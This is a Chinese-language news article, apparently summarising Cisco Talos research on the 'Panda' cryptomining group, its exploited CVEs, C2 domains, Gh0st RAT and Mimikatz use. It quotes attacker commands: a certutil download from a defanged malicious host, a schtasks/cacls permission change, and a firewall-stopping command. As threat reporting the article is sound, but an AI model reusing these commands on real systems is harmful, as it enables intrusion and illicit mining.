通過使用遠端管理工具（RAT）和非法的加密貨幣挖礦惡意軟體，一個名為“Panda”的黑客組織到目前為止已經搞到了價值約10萬美元的門羅幣。

思科Talos團隊表示，雖然Panda算不上技術高超，但它絕對是目前全球最為活躍的黑客組織之一，攻擊目標涵蓋醫療保健、運輸、電信、IT服務等行業。

Panda黑客組織在2018年7月被發現

2018年7月，思科Talos團隊首次發現了Panda黑客組織。

在當時，Panda利用了WebLogic漏洞（CVE-2017-10271）和Apache Struts 2遠端程式碼執行漏洞（CVE-2017-5638）來下載並安裝被命名為“downloader.exe”的加密貨幣挖礦惡意軟體，並將其以簡單的數字命名（如“13.exe”）儲存在TEMP資料夾中。

然後，加密貨幣挖礦惡意軟體會通過埠57890從list[.]idc3389[.]top或kingminer[.]club（HFS網路檔案伺服器）下載配置檔案（包含門羅幣錢包及礦池地址）。

截止到2018年10月，託管在list[.]idc3389[.]top上的配置檔案被下載的次數就已經超過了30萬次。

除加密貨幣挖礦惡意軟體外，同時被下載並安裝的惡意軟體還包括Gh0st RAT，以及一些其他的黑客工具和漏洞利用程式，如憑證竊取工具Mimikatz和Equation Group黑客組織的UPX加殼工具。

Panda與Bulehero挖礦蠕蟲存在關聯？

思科Talos團隊表示，在發現Panda的同時，他們在另外一個C2域bulehero[.]in中也觀察到了非常類似的TTP（戰術、技術和程式）。

攻擊者同樣採用的是PowerShell來下載一個被命名為“downloader.exe”的檔案，並同樣將其以簡單的數字命名（如“13.exe”）。

在沙箱環境中，思科Talos團隊觀察到downloader.exe通過埠57890對一個被命名為“cfg.ini”的檔案發出了GET請求，而該檔案託管在bulehero[.]in的一個子域“c[.]bulehero[.]in”上。

不僅如此，downloader.exe還試圖使用諸如“cmd /c net stop MpsSvc”之類的命令來關閉受害者的防火牆，並試圖修改訪問控制列表以及通過執行cache .exe來授予對某些檔案的完全訪問許可權。

例如：

cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F

而Bulehero挖礦蠕蟲也存在類似的行為。

除此之外，appveif.exe會在系統目錄中建立許多檔案，其中就有一些檔案與Bulehero挖礦蠕蟲活動中的惡意檔案相匹配。例如，它們都被安裝在相同的目錄下：\\Windows\\InfusedAppe\\Eternalblue139\\specials\\。

Panda黑客組織的演變

2019年1月，思科Talos團隊觀察到Panda利用了最新披露的一個ThinkPHP網路框架漏洞（CNVD-2018-24942）來傳播類似的惡意軟體。

此外，Panda還將一個簡單的PHP Web shell上傳到了路徑“/public/hydra.php”，用於呼叫PowerShell來下載類似的可執行檔案“download.exe”，進而下載非法的加密貨幣挖礦惡意軟體。

值得注意的是，download.exe已經被新增了能夠進行SMB掃描的能力。

2019年3月，思科Talos團隊觀察到Panda使用了新的基礎架構，包括hognoob[.]se的各個子域。

總的來說，Panda的TTP沒有太大的改變——在實現漏洞的成功利用後，Panda仍會呼叫PowerShell來從託管惡意檔案的伺服器（新地址：hxxp://fid[.]hognoob[.]se/download.exe）下載被一個被命名為“download.exe”的可執行檔案，並將其儲存在Temp資料夾中。

不同的是，檔案命名相較之前要複雜得多，如“autzipmfvidixxr7407.exe”。

之後，這個檔案將從fid[.]hognoob[.]se下載被命名為“wercplshost.exe”的挖礦木馬，並從從uio[.]hognoob[.]se下載配置檔案“cfg.ini”。

Wercplshost.exe包含為實現蠕蟲式傳播的漏洞利用和SMB暴力破解模組，其中許多都來自Shadow Brokers（影子經紀人）黑客組織。此外，它還會使用開源工具Mimikatz來收集受害者的密碼。

此後不久，Panda開始更新其有效載荷，使其包含了一些新的功能，比如使用Certutil以及以下命令下載加密貨幣挖礦惡意軟體：

certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:WindowsTempupnpprhost.exe

以及使用如下命令來執行加密貨幣挖礦惡意軟體：

cmd /c ping 127.0.0.1 -n 5 & Start C:Windowsugrpkute[filename].exe

2019年6月，Panda開始利用較新的WebLogic漏洞CVE-2019-2725，但TTP依然沒有太大變化。

在過去的一個月裡，Panda開始使用新的C2伺服器和有效載荷託管基礎設施，以及備用礦池。

結論

Panda算不上技術高超，甚至可以說是非常糟糕。例如，許多舊的域名和新的域名都託管在同一個IP上，並且TTP始終沒有太大的變化，惡意有效載荷也不復雜。

不過，這依舊擋不住Panda已成為目前全球參與非法挖礦活動最活躍的組織之一。

值得注意的是，Panda會經常切換利用各種不同的漏洞。只要有新的POC程式碼可用，它幾乎都會嘗下鮮。對於不常更新的使用者來說，Panda無疑是一個巨大的威脅。